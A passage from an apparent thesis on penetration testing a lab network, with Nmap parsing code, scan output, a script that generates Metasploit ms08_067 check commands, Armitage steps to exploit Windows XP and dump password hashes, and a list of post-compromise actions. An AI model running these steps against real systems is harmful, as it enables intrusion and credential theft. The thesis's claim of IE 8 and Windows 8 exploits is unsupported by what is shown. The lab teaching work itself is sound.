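        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        hosts[host] = [
            {"port": int(p), "state": st, "proto": pr, "service": svc, "version": ver}
            for p, st, pr, _owner, svc, _rpc, ver in PORT_RE.findall(ports_field)
        ]
    return hosts


def open_ports(records) -> list:
    return sorted(r["port"] for r in records if r["state"] == "open" and r["proto"] == "tcp")


def state_counts(records) -> Counter:
    return Counter(r["state"] for r in records)


def looks_like_domain_controller(ports) -> bool:
    # Editor's heuristic: Kerberos, LDAP, LDAPS, kpasswd and Global Catalog together
    # are the standard footprint of an Active Directory domain controller.
    return {88, 389, 636, 464, 3268, 3269}.issubset(set(ports))


def report(hosts: dict) -> str:
    lines = []
    for host, records in hosts.items():
        lines.append("Host %s: %s" % (host, dict(state_counts(records))))
        for r in sorted(records, key=lambda r: r["port"]):
            lines.append("  %5d/%s  %-10s %-18s %s" % (
                r["port"], r["proto"], r["state"], r["service"], STATE_MEANING.get(r["state"], "")))
        if looks_like_domain_controller(open_ports(records)):
            lines.append("  note: open port set matches an Active Directory domain controller")
    return "\n".join(lines)


if __name__ == "__main__":
    print(report(parse_gnmap(SAMPLE)))
```

The value of keeping the state column rather than just the open ports is that filtered entries map the firewall: a port that is filtered from outside but open from the inside tells the tester where the perimeter actually is.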
In this phase, all the gathered information was fine-tuned to complement the scanning and vulnerability assessment techniques. Normally, both automated scanners and manual techniques are used, but manual techniques require more time to perfect the scan and identify vulnerabilities. Both should be used for comprehensive knowledge of the possible vulnerabilities that might affect the system or network. However, if the system or network to be tested were a large network with hundreds of systems, a manual technique would not be an effective and efficient approach.
Zenmap was selected to scan the laboratory network and the targeted hosts. This scanner was used to identify which operating systems and services were running on the targeted hosts, and to learn which hosts and services were vulnerable. The output generated by the scanner is investigated further in the exploitation and post-exploitation phases, using the Metasploit framework, to verify which exploits are possible against the vulnerable hosts and services.

4.4.2 Zenmap

This software tool was used to scan the above web servers, portal.hopoly.edu.gh and ait-open.net, as well as a local DHCP server on my intranet. Those outputs exposed a number of weaknesses, but, so as not to breach security laws, only the locally built DHCP server was used for the laboratory testing.
The server in question has the IP address 10.27.65.61 and the results are as follows:


Figure 4.6


Figure 4.7

Figure 4.8

Analyzing the detailed information captured in the figures above shows that the host with IP address 10.27.65.61 was scanned to detect vulnerabilities. Looking closely at figure 4.7, twenty-two (22) open ports were discovered, which were:
Discovered open port 5900/tcp on 10.27.65.61
Discovered open port 80/tcp on 10.27.65.61
Discovered open port 135/tcp on 10.27.65.61
Discovered open port 3389/tcp on 10.27.65.61
Discovered open port 139/tcp on 10.27.65.61
Discovered open port 1025/tcp on 10.27.65.61
Discovered open port 445/tcp on 10.27.65.61

Discovered open port 53/tcp on 10.27.65.61
Discovered open port 5800/tcp on 10.27.65.61
Discovered open port 1040/tcp on 10.27.65.61
Discovered open port 1047/tcp on 10.27.65.61
Discovered open port 593/tcp on 10.27.65.61
Discovered open port 464/tcp on 10.27.65.61
Discovered open port 1026/tcp on 10.27.65.61
Discovered open port 3268/tcp on 10.27.65.61
Discovered open port 1048/tcp on 10.27.65.61
Discovered open port 1077/tcp on 10.27.65.61
Discovered open port 636/tcp on 10.27.65.61
Discovered open port 389/tcp on 10.27.65.61
Discovered open port 88/tcp on 10.27.65.61
Discovered open port 1028/tcp on 10.27.65.61
Discovered open port 3269/tcp on 10.27.65.61
Each open port is a service an attacker can probe and, if that service is vulnerable, use to compromise the system. The combination found here is telling: 88 (Kerberos), 389/636 (LDAP/LDAPS), 464 (Kerberos password change), 3268/3269 (Global Catalog) and 53 (DNS) are the standard signature of an Active Directory domain controller, while 3389 is Remote Desktop and 5800/5900 are VNC, so this host is far more than the file/DHCP server its name suggests. In addition, Nmap discovered Windows Server 2003 (version 5.2) as the operating system running on the server, ftpserver as the computer name and ftpserver.hopolycomputerscience.com as its fully qualified domain name. The tool also reports the number of hops to the destination host; 3 hops were captured:
78.00 ms 192.168.3.1
78.00 ms 172.29.81.254
93.00 ms 10.27.65.61


In a real-world scenario, or if the penetration test were conducted from outside the network, an ICMP ping scan would not always provide significant value in intelligence gathering, because many organizations filter ICMP to their hosts and networks. Therefore, port scanning tools and techniques using other protocols, such as TCP or UDP probes, were used to overcome the ineffectiveness of ICMP. Such scans take a lot of time, and the penetration tester should be conscious of the testing timeline, but they give valuable information for further host and service enumeration.
To conclude on Nmap scanning, this tool is found in hacking or penetration testing operating systems such as BackTrack, Kali Linux and Blackbuntu. It also has a graphical front end, Zenmap, and it can scan servers protected by a firewall.
In the few laboratory tests conducted personally, Nmap or Zenmap revealed the IP address of the server, the number of open ports available, the operating system running on the system and the protocols in use. After gathering this information, an exploit can be used to compromise the system using Metasploit and other password cracking tools.

4.5 EXPLOITATION/ATTACK

At this stage, the vulnerabilities identified using Nmap are verified to find out whether the vulnerabilities and loopholes identified during the scanning and vulnerability assessment phase pose any real security threat. This phase acts as verification of potential vulnerabilities and thus entails the highest risk within a penetration test. During the exploitation phase, vulnerabilities are exploited using publicly available exploits. Metasploit is one such open source exploitation framework, and it was used extensively during this and the post-exploitation phase of the penetration test.
Metasploit is a security framework originally developed in Perl by H. D. Moore in 2003, later rewritten in Ruby, and acquired by Rapid7 in 2009. It incorporates many aspects of security testing, from reconnaissance, exploit development and payload packaging to the delivery of exploits to vulnerable systems, and wraps them into a single application to aid penetration testing.
The key steps for exploiting a system using the Metasploit Framework are:
1. Choose and configure an exploit for the target.
2. Validate whether the target system is vulnerable to the chosen exploit (the exploit's check command, where the module supports it).
3. Select and configure the payload that will be used.
4. Choose and configure an encoder, so that the payload avoids bad characters and is less likely to be caught by signature-based Intrusion Detection Systems (IDS).
MSF consists of modules that are combined to effect an exploit. The modules and their specific functions are as follows:

Exploit: the code that targets a specific vulnerability. Active exploits attack a specific target, run until completed, and then exit. Passive exploits wait for incoming hosts, such as web browsers or FTP clients, and exploit them when they connect.

Payload: the code that runs on the target immediately after successful exploitation, for example a command shell or Meterpreter.

Auxiliary modules: these do not establish or directly support access between the tester and the target system; instead they perform related functions such as scanning, fuzzing or sniffing that support the exploitation phase.

Post modules: following a successful attack, these run on compromised targets to gather useful data and pivot the attacker deeper into the target network.

Encoders: when exploits must bypass antivirus defenses, these modules encode the payload so that it cannot be detected by signature-matching techniques.

NOP generators: these produce no-operation sleds that pad a payload so that a jump into the buffer need not land on an exact address, which makes buffer overflow exploits more reliable.

Kali Linux is the operating system used, incorporating many penetration testing tools, and msfconsole is the command used to launch Metasploit on the Kali Linux machine.
The Local Area Network (LAN) laboratory used to exhibit penetration testing in practice, with Kali Linux as the operating system for the job, is shown in the diagram below:

Figure 4.9: laboratory LAN diagram. Labels: KALI LINUX PEN-TESTER 172.29.81.93/20; 172.29.81.254/20; 172.29.81.90/20; 10.27.65.63/18; 172.29.81.2/20; 10.27.65.1/18.

Zenmap was used to scan two of the three hosts for vulnerabilities. A lot of information was gathered, essentially the open port numbers. The hosts scanned first were 172.29.81.2/20 and 172.29.81.90/20, and the two figures below give the intelligence gathered about those systems:


Figure 4.10


Figure 4.11

The most important information from the scan is the table below:

PORT      STATE   SERVICE        VERSION
139/TCP   open    netbios-ssn    Microsoft Windows XP
445/TCP   open    microsoft-ds   Microsoft Windows XP
2869/TCP  closed  icslap

Table 4.12

Figure 4.13

Figure 4.14

PORT      STATE   SERVICE         VERSION
135/TCP   open    msrpc           Microsoft Windows RPC
139/TCP   open    netbios-ssn
445/TCP   open    microsoft-ds    Microsoft Windows XP
3389/TCP  open    ms-wbt-server   Microsoft Terminal Service

Table 4.15

Now the penetration tester has acquired a lot of information about the target system and network, and this information is used to break into the target system. At this point, however, the tester should consider the external factors that affect which tools to use and when. This phase acts as verification of potential vulnerabilities and thus entails the highest risk within a penetration test, so it should be performed with a lot of caution.
All possible effects need to be carefully considered; every exploit needs to be thoroughly tested in a controlled environment before critical test procedures, such as the use of buffer overflow exploits, are performed against live systems. Time restrictions always exist, forcing the penetration tester to make use of a framework, since frameworks save a lot of time compared with writing custom exploits. Armitage is one such open source graphical front end to the Metasploit framework, and it is very easy to use because of its graphical interface.

4.5.1 PRIVILEGE ESCALATION

After an initial compromise of the target system or network, the penetration tester should look for ways to increase their access to the system. Suppose the tester has gained local system access; the tester should then make an effort to carry out further analysis of the target system in order to gain root privilege. Likewise, if the tester has network access, the tester should sniff traffic on the network to see what sensitive information can be obtained. Successful exploitation of a vulnerability does not guarantee root access, so the tester should make constant attempts to escalate privilege, and in the process might install rootkits or backdoors that assist in gaining a higher privilege level. This process is called privilege escalation.
Along with vulnerability exploits, social engineering tactics should also be deployed for the purpose of privilege escalation, because social engineering has proven to be an effective way of obtaining sensitive information about a company and its employees.
At the end of this phase the penetration tester will most likely have an understanding of the security strengths and weaknesses of the target system or network. The penetration test will soon conclude, and the tester will begin work on the final report. It is necessary to remember that the actual goal of a penetration test is not only to compromise a system or network, but also to inform and bring awareness to the stakeholders and computer professionals, especially the network/system administrators associated with the organization, as to what vulnerabilities exist on their systems.

4.6 USING ARMITAGE FOR ATTACK

Armitage is frequently overlooked by penetration testers who eschew its Graphical User Interface (GUI) in favour of the traditional command-line input of the Metasploit console. However, it exposes Metasploit's functionality while giving visibility to its many possible options, making it a good alternative in complex testing environments, and it makes working against many targets at once straightforward.
To start Armitage, ensure that the database and Metasploit services are started using the following commands:

service postgresql start

service metasploit start

After that, type armitage at the command prompt to launch it.


To discover available targets, you can manually add a host by providing its IP address or select
an nmap scan from the Hosts tab on the menu bar. Armitage can also enumerate targets using
MSF auxiliary commands or DNS enumeration.

4.7 COMPROMISE THE TARGET MACHINE

When Armitage has launched successfully, the menu bar shows six tabs: Armitage, View, Hosts, Attacks, Workspaces and Help.
Since enough intelligence was gathered in the reconnaissance stage, click on:

Hosts

Nmap Scan, and follow the arrow to click on Intense Scan.

This procedure asks for the range of IP addresses in which your target machines can be found. In this exercise I entered the target IP addresses 172.29.81.2/20, 172.29.81.90/20, 172.29.81.91/20 and 172.29.81.93/20, which displayed the target machines in the figure below:


Figure 4.16

Sometimes an Nmap scan does not give the actual state of the machines, so more detailed information about the target machines is needed. Highlight the target machines, click on Hosts, and follow the arrow to MSF Scans. This displays the IP addresses with their open ports; the MSF scan exposed the true state of the programs running on those machines.
The host 172.29.81.94 had been displayed on port 445 as Windows XP, but after the MSF scan was run it was revealed to be running Windows 8.1 as its operating system, in a workgroup rather than a domain.
The host 172.29.81.2 was running Windows XP Service Pack 2, and 172.29.81.90 was running Windows XP Service Pack 3 with the domain name pearl.
To find the services each target machine is running, click on the target machine and then on Services. Applying this to 172.29.81.93/20, 172.29.81.2/20 and 172.29.81.90/20 displayed the information in the respective tables below:


SERVICES RUNNING ON 172.29.81.93/20

HOST              SERVICE        PORT    PROTOCOL  INFO
IP 172.29.81.93   msrpc          135     TCP       Microsoft Windows RPC
IP 172.29.81.93   netbios-ssn    139     TCP
IP 172.29.81.93   smb            445     TCP       Windows 8.1 (build 9600)
IP 172.29.81.93   http           5357    TCP       Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
IP 172.29.81.93   msrpc          49152   TCP       Microsoft Windows RPC

SERVICES RUNNING ON IP ADDRESS 172.29.81.2/20

HOST              SERVICE        PORT    PROTOCOL  INFO
IP 172.29.81.2    netbios-ssn    139     TCP
IP 172.29.81.2    smb            445     TCP       Windows XP Service Pack 2
IP 172.29.81.2    ms-wbt-server  3389    TCP       Microsoft Terminal Service

SERVICES RUNNING ON IP ADDRESS 172.29.81.90/20

HOST              SERVICE        PORT    PROTOCOL  INFO
IP 172.29.81.90   msrpc          135     TCP       Microsoft Windows RPC
IP 172.29.81.90   netbios-ssn    139     TCP
IP 172.29.81.90   smb            445     TCP       Windows XP Service Pack 3
IP 172.29.81.90   ms-wbt-server  3389    TCP       Microsoft Terminal Service

Table 4.17

Penetration testing is about finding vulnerabilities and flaws in a network or system. To start an attack, the Attacks menu offers a Hail Mary entry: this launches a blind attack that fires every applicable exploit at the selected target machines. It is very noisy and can easily cause the target system to crash, so it has no place against production systems.


Pen-testing is about finding flaws in systems, so let us find the vulnerabilities on the target machine with the IP address 172.29.81.2/20. Click:

Attack, then follow the arrow to

smb, and

check exploits

This displays a dialogue box indicating that an Attack menu is attached to each host in the targets window once the target machines have been highlighted. Right-clicking on each machine then brings up the exploits to be used for the attack.
SMB (Server Message Block) is the file- and printer-sharing protocol of Windows; on Linux the same protocol is implemented by Samba.
After the check was run, a vulnerability was identified on the 172.29.81.2 machine, as shown in the following table.

172.29.81.2 TARGET MACHINE VULNERABILITIES

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 172.29.81.2
RHOST => 172.29.81.2
msf exploit(ms08_067_netapi) > check
[+] 172.29.81.2:445 The target is vulnerable.

Table 4.18

With the vulnerability on the 172.29.81.2 target machine revealed, to launch the attack right-click the target computer;

Click Attack

Click smb

Then click ms08_067_netapi. A dialogue box is displayed; click the Launch button and the targeted computer is compromised. In figure 4.19 the compromised system shows up as an icon with a red border and electrical sparks.


Figure 4.19
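Every Armitage click above corresponds to a Metasploit console command, and Table 4.18 shows the ones behind Attack > smb > Check exploits. The following Python script is an added example, not code from the thesis, from Armitage or from Metasploit: it reads an Nmap XML report (the output of nmap -oX), selects the hosts that look like the Windows SMB targets of Table 4.17 (host up, TCP/445 open, a Windows OS match) and writes the msfconsole resource script that runs the same ms08_067_netapi check against each of them, so the check can be repeated over a whole scan instead of clicking through every host. The XML embedded below is constructed to match the lab tables and is not a real scan; the file names lab.xml and check_smb.rc in the usage note are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed Nmap -oX output shaped like the lab scan behind Tables 4.17 and 4.18.
# Sample data for this example only, not the thesis' real scan results.
NMAP_XML = """<nmaprun scanner="nmap">
  <host><status state="up"/>
    <address addr="172.29.81.2" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP3" accuracy="98"/></os>
  </host>
  <host><status state="up"/>
    <address addr="172.29.81.90" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server" product="Microsoft Terminal Service"/></port>
    </ports>
    <os><osmatch name="Microsoft Windows XP SP3" accuracy="95"/></os>
  </host>
  <host><status state="up"/>
    <address addr="172.29.81.93" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="445"><state state="closed"/><service name="microsoft-ds"/></port>
    </ports>
    <os><osmatch name="Linux 3.X" accuracy="90"/></os>
  </host>
  <host><status state="down"/>
    <address addr="172.29.81.100" addrtype="ipv4"/>
  </host>
</nmaprun>
"""

EXPLOIT = "windows/smb/ms08_067_netapi"   # the module used in Table 4.18


def smb_candidates(xml_text):
    """IPs of hosts that are up, have TCP/445 open and were fingerprinted as Windows."""
    targets = []
    for host in ET.fromstring(xml_text).findall("host"):
        status = host.find("status")
        addr = host.find("address[@addrtype='ipv4']")
        if status is None or status.get("state") != "up" or addr is None:
            continue
        smb_open = any(
            p.get("protocol") == "tcp" and p.get("portid") == "445"
            and p.find("state") is not None and p.find("state").get("state") == "open"
            for p in host.findall("ports/port")
        )
        osmatch = host.find("os/osmatch")
        is_windows = osmatch is not None and "windows" in osmatch.get("name", "").lower()
        if smb_open and is_windows:
            targets.append(addr.get("addr"))
    return targets


def check_script(targets, module=EXPLOIT):
    """msfconsole resource script equivalent to Armitage's Attack > smb > Check exploits.

    Only 'check' is issued, never 'exploit': check probes the service without
    triggering the overflow, whereas the exploit itself (like Hail Mary) can crash it.
    RHOST is the option name shown in Table 4.18; current Metasploit also accepts RHOSTS.
    """
    lines = [f"use {module}"]
    for ip in targets:
        lines.append(f"set RHOST {ip}")
        lines.append("check")
    lines.append("exit")
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    # With a real scan: replace NMAP_XML by open("lab.xml").read() (assumed file name).
    print(check_script(smb_candidates(NMAP_XML)), end="")
```

Usage: scan the lab range with nmap -sV -O -oX lab.xml, run the script and redirect its output to check_smb.rc, then run msfconsole -r check_smb.rc. A "[+] ... The target is vulnerable" line is the same answer Table 4.18 shows; a check result only says the service looks vulnerable, it does not guarantee that the exploit will land cleanly, and the exploit, unlike the check, can crash the target's Server service.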

When the target machine was compromised, the terminal prompt changed to meterpreter >.
Meterpreter (meta-interpreter) is an advanced payload included in the Metasploit Framework and is
one of its best. With it you can upload and download the victim's files by browsing the compromised
machine's directories. Meterpreter works with most of the exploits and auxiliary modules in Metasploit,
which makes it the most sophisticated and most widely used payload among pentesters and hackers.
The platform allows developers to write their own extensions in the form of shared object (DLL) files
that can be uploaded and injected into a running process on the target computer after exploitation
has occurred.
Meterpreter and all of the extensions it loads are executed entirely from memory and never touch the
hard disk, which is what keeps them out of reach of disk-based antivirus scanning.
On Windows, local account passwords are stored as LM and NT hashes in the SAM database. After the
system has been compromised these hashes can be dumped and cracked offline with John the Ripper by
following this procedure:


Right click the target machine

Click Meterpreter and follow the arrow to

Access

Dump Hashes

lsass method or registry method

The lsass method reads the hashes out of the running lsass.exe process, while the registry method reads
them from the SAM hive; both need SYSTEM privileges on the target, which the ms08_067_netapi session
already has because the exploited service runs as SYSTEM.

In hacking, pivoting means compromising a target machine and then using that machine as a relay to
attack other machines on the network that the attacker cannot reach directly.

To use Armitage to access all directories on the compromised 172.29.81.2 target machine, follow this
procedure:

Right click the compromised machine

Click on Meterpreter

Click Browse Files; a Files 1 tab then displays the directories, from which the information being
looked for can be accessed.

In the modern world of hacking and system attacks, attackers are less concerned with the exploitation
itself than with what can be done with the access it gives. This is the part of the kill chain where the
attacker achieves the full value of the attack.
Once a system has been compromised, the attacker generally performs the following activities:

Conducts a rapid assessment to characterize the local environment (infrastructure, connectivity,
accounts, presence of target files, and applications that can facilitate further attacks)

Locates and copies or modifies target files of interest, such as data files (proprietary data and
financial information)

Creates additional accounts and modifies the system to support post-exploitation activities

Attempts to escalate privileges vertically by capturing administrator or system-level credentials

Attempts to attack other systems (horizontal escalation) by pivoting the attack through the
compromised system to the remainder of the network

Installs persistent backdoors and covert channels to retain control and keep secure
communications with the compromised system

Removes indications of the attack from the compromised system


4.8 REPORT

Penetration testing is conducted under an agreement between the testing team (the red team) and the
client, to reveal the flaws or vulnerabilities the client's network has. In this agreement, consensus is
reached on the scope of the test, and any flaws found are captured in the report and are not to be
revealed to any third party.
The flaws found are then worked on to maintain a secure system or network. In the practical exercise
conducted here, where the 172.29.81.2 machine was compromised, the vulnerabilities captured from the
Windows XP operating system were three open ports, 135, 139 and 445; port 445 exposed the
ms08_067_netapi flaw, an unpatched service that needs to be patched.
I used this flaw to attack and compromise 172.29.81.2, from where other files could easily be
accessed. Therefore, companies that have automated their businesses should, one way or another, allow a
red team to conduct a penetration test so that they can seal all loopholes. In Ghana this IT field is not
common, so IT managers in the various firms must give it major attention for safe data keeping.
The report must describe the detailed results of all phases and must be prepared along with findings
and recommendations for improvement. The report should include the following items:


SAMPLE PENETRATION TEST REPORT

Executive Summary
This section explains the objective behind the penetration test, the key results, and the
recommended high-level action plan to rectify the risks. The target audience is mainly
non-technical executives, so the focus should be on the business risks.

Approach
This section outlines the methodology implemented during the penetration test.

Scope
This section explains the scope of the test as well as the out-of-scope items.

List of Tools and Techniques
This section briefly describes the tools and techniques used during the penetration test.

Findings
This section lists all identified vulnerabilities, evaluated and prioritized by their level of
risk to the business. It also contains the detailed positive and negative test findings.

Recommendations
This section contains recommendations and action plans for mitigating the vulnerabilities,
based on risk priority.

Table 4.20


Along with reporting, cleaning up and disposal of artifacts must also be done in this phase: all the
artifacts of the test, such as vulnerability reports, exploitation payloads, and any backdoors or rootkits
installed on compromised systems, must be removed. From the network and system administrator's perspective,
the reporting phase serves as a reference for hardening the system or network. The document includes a
list of countermeasures for the vulnerabilities that affected the system or network through improper
patching or improper configuration. The report also helps the network or system administrator keep track
of the exploits that successfully compromised the system or network, and hence to take corrective measures
so that the same exploitation cannot succeed when a real attack or compromise takes place.

CHAPTER 5

DISCUSSION AND CONCLUSION

5.1 ANALYSIS AND DISCUSSION

This chapter sums up the results obtained during the penetration test in the network laboratory, gives a
brief overview of why a penetration test methodology is necessary, and evaluates whether the goals and the
problem statement set out in the first chapter were satisfactorily addressed. This leads to a discussion of
the contributions made by this thesis and of future work.
The intelligence gathering phase identified the machines that were reachable and the ports open on them,
and guessed the OS and the services running on those machines. Nmap was the primary tool selected for this
phase. Nmap proved to be a versatile tool that can perform scans ranging from ping sweeps to port scans to
OS and service fingerprinting. Nmap was first used to scan the entire 172.29.81.0/20 network range. This
scan identified many hosts, of which the target machines 172.29.81.2/20, 172.29.81.90/20 and
172.29.81.93/20 were examined further. The result showed that ICMP packets within the network were not


blocked, and the scan showed all 1000 default ports on the identified machines as unfiltered, meaning that
no firewall or perimeter device was filtering traffic to the target machines.
The detailed Nmap scan, showing open ports, closed ports and the services running on the machines, was
fully captured in Table 4.17, and the vulnerability check in Table 4.18.
The most striking result came from the main target machine when Armitage was used: the Metasploit check
(use windows/smb/ms08_067_netapi against 172.29.81.2, port 445) reported that the target was vulnerable.
Both the Windows XP and the Windows 8 machines were running default installations with no additional
software installed. In the laboratory network both of these vulnerabilities were successfully exploited
with the Metasploit Framework through Armitage, its graphical interface, as shown in Figure 4.19.
The exploits performed against the SMB and IE 8 vulnerabilities proved that such exploitable
vulnerabilities still exist in systems even after Microsoft has released the patches for them. The results
show that penetration testing is still useful in identifying the weak links in a network or system. If
performed properly and methodically, it provides network and system administrators with a wealth of
information for taking corrective measures against such vulnerabilities and securing the overall network
or system.

5.2 REFLECTION ON THE PROPOSAL METHODOLOGY

One of the goals set in this thesis was to identify how penetration testing is lawfully conducted, in order
to understand and analyse the security issues of network systems as a whole. To achieve this goal, a
penetration testing methodology was proposed in section 4.1. Following this methodology, penetration tests
were conducted against the laboratory network, which represented an internal network with a few client and
server machines. For network and system administrators, securing the network and its systems is an important
task to protect them from outside as well as inside attacks. Security measures like firewalls and Intrusion
Detection Systems (IDS) help to protect, but such measures are not always sufficient in today's complex
environment. A methodical penetration test complements such measures by testing whether the security
measures in place are good enough or have flaws or misconfigurations.


The proposed methodology not only showed how network and system administrators can make use of a
penetration test, but also made the flow of the test and each of its phases understandable. It also showed
how free or open source software can effectively test networks or systems. These points were discussed in
the literature and methodology chapters, which demonstrated how such tools complement an administrator's
efficiency in assessing overall system security. The tools selected for each phase of the proposed
methodology were easy to install and configure, had a minimal learning curve, and did not require high-end
hardware to set up the penetration test.
The objective of the reconnaissance or information gathering phase was to map the network, discover the
reachable machines, and determine the open ports, services and operating systems within the entire network
segment. The objective of the scanning and vulnerability assessment phase was to enumerate further and to
make use of automated scanners, which enhance scanning and assessment and pick up information that might
have been missed during reconnaissance. Analysis of the results or reports from the reconnaissance phase
gives deeper insight into the network or system, and further analysis revealed the real flaws, whether a
faulty configuration or an unpatched system. The penetration testing methodology succeeded in achieving the
objectives set for the scanning and vulnerability assessment phase. From the pen-tester's perspective, one
can ask whether the tester should spend additional time performing such testing. The results of this thesis
showed that penetration testing has value when performed in a systematic and methodical manner; it is
something network and system administrators should not do without, alongside all the other activities they
perform to harden their systems.

5.3 CONTRIBUTION

Network administrators should be skilled in performing penetration tests so that they know the flaws their
network systems have. Not all network and system administrators can afford to purchase commercial tools to
perform a penetration test; in particular, an administrator in a small or medium organization will not
always have a separate budget to purchase tools or to hire a third-party professional to perform the test.
In such a situation this thesis can provide baseline information, with all the tools and methodology
needed. Any administrator can easily replicate the same or a similar penetration testing environment, and
the scope can be broadened as required.
At present, most network and system administrators defend their networks and systems with firewalls to
block unidentified or malicious traffic, Intrusion Detection Systems (IDS) to detect and respond to attacks,
and anti-virus and anti-malware programs to alert users about malicious software, the goal being to defend
the system or network from malicious users and intrusion attempts. All of these measures are protective and
preventive in nature, and they may succeed or fail depending on when they were released and on the current
evolution of technology. Security, however, should not only include prevention and protection but also
prediction and response.
This thesis also presented a prediction and response model: phases like intelligence gathering and
scanning and vulnerability assessment can be used to predict how the network or system will fare, while
phases like exploitation and reporting provide the response needed to counter the threats and loopholes.
After a certain time a given vulnerability or attack becomes obsolete, but the knowledge of how the software
responded to an attack of that kind can help in identifying similar behaviour in the future.

5.4 FUTURE WORK

This work can be extended in different directions:

Automation of the entire proposed penetration testing methodology, to build a complete security
testing solution. This extension would enable the network and system administrators of small and
medium-scale organizations to test and measure their IT assets without hassle.

Inclusion of the human factor, to increase the efficiency of a penetration test. The focus of this
thesis was on finding and exploiting vulnerabilities related to computer networks; however, employees
within an organization are the weakest link in security, so effort can be made to integrate social
engineering tools and techniques into the existing penetration testing methodology.

Training of computer users in the organization to recognize the techniques hackers use in
reconnaissance.


5.5 CONCLUSION

After a deep study of penetration testing frameworks and analysis of the various tools used, we have
reached the following conclusions:

Penetration testing provides an organization with a snapshot of the overall security of its
network infrastructure.

A penetration test should be carried out with a proper methodology. The planning and analysis
phase should be taken most seriously, as everything done after it relies on this phase.

Of the commercial and open source exploitation tools examined, the Metasploit Framework with
Armitage proved the most capable. Integrating Metasploit with tools like Nessus, Nmap and other
third-party tools makes it very efficient, and Metasploit and Armitage offer various extensions and
commands that can be used for post-exploitation.

An automated penetration testing framework integrated with various third-party tools works much
faster than manual testing.

This thesis explored and investigated various network penetration testing tools and methodologies. The
main results are as follows:

An enhanced framework for network penetration testing was designed and developed over a personally
built laboratory network. This framework tries to find the loopholes and vulnerabilities in the
network and exploit them before attackers do, and hence provides assurance of a secure network.

The use of penetration testing over a campus network was demonstrated, avoiding the expenditure of
hiring professional testers, who follow the same tools and techniques, and the uncertainty of
relying on them.

The success of any penetration test depends on the underlying methodology. In order to perform a
successful penetration test, the underlying methodology should also make use of different security tools.
One of the goals set in this thesis was to examine different security tools and techniques. Tools like
Nmap, Nessus, Armitage and the Metasploit Framework were introduced first and then examined. The selection
of the tools was based on their versatility, usability and effectiveness. With all the tools in hand, each
phase of the methodology was carried out in a systematic and methodical manner. The selected tools were
divided into three categories. The reconnaissance or intelligence gathering phase covered the tools that
assisted in network profiling, network scanning and operating system and service fingerprinting; Nmap was
identified as one of the best tools in this phase. The scanning and vulnerability assessment phase covered
the tools that allowed the exploration of network and system vulnerabilities. The Metasploit Framework,
with Armitage, was more than a tool: it was a complete penetration testing framework, but it could also be
used as a tool during the exploitation and post-exploitation phases because of its abundance of exploits,
its usability and its effectiveness. However, the best and most powerful tool a penetration tester can have
is the brain, because penetration testing is not always about tools; tools and techniques can be a matter
of choice and expertise.
In conclusion, tools and methodology, if properly utilized, can prove their usefulness for understanding
the weaknesses of a network or system and how they might be exploited. Penetration testing is not an
alternative to other security measures; rather, it should be used to complement the defense-in-depth
principle.
In today's world of information security, where threats and vulnerabilities are constantly changing and
evolving, the penetration testing tools and methods used to combat them should also change and evolve along
with technological advancement.

5.6 REFERENCES

1. Security information for the study of Maltego: www.searchsecurity.techtarget.in
2. Operating system hacking and security with DMitry: www.operatin5.blogspot.be
3. Detailed study of the Jigsaw tool: www.threatpost.com/improved-jigsaw-hacking-tool-spotted-inattacks/102016
4. Fierce tool study: www.hackersgarage.com
5. Fping data collection tool study: www.irongeek.com
6. Dnsdict6 tool for penetration testing and hacking: www.hackingtools.com/dnsdict-hack-tool-tutorialknown-your backtract-hackingloops/
7. Information about Nmap: www.resources.infosecinstitute.com
8. Kismet hacking tool: www.ehacking.net/2011/051/kismetwireless.net/documentation.html
9. Wireshark tool tutorial: www.concise-course.com/security/wireshark-basics/
10. Burp Suite hacking tool: www.securityninja.co.uk/application-security/burp-suite-tutorialintruder-tool-version
11. Nikto: null-byte.wonderhowto.com/how-to/hack-like-pro-find-vulnerabilities-for-any-websiteusing-nikte-0151729 and www.tecmint.com
12. OpenVAS information gathering tool: sathisharthars.wordpress.com
13. Cisco Global Exploiter: www.toolwar.com/2014/02/cisco-global-exploiter-cge-tools.html
14. Yersinia hacking tool: mynatsatety.com/2011/11/yersima-how-to-analyzey-and-testing.html
15. THC-Hydra: ishackers.blogspot.com/p/the-hydra.html
16. John the Ripper password cracking tool: www.binorytides.com/cracking-linux-password-withjohn-the-ripper-tutorial/
17. Metasploit study guide: www.ehacking.net/2011/10/metasploit-basic-command-tutotial.html
18. Browser Exploitation Framework (BeEF): tipstrictshack.blogspot.com
19. Rootkits for hiding information after a hack: nrupentheking.blogspot.com/2011/03/rootkitrevealed.html
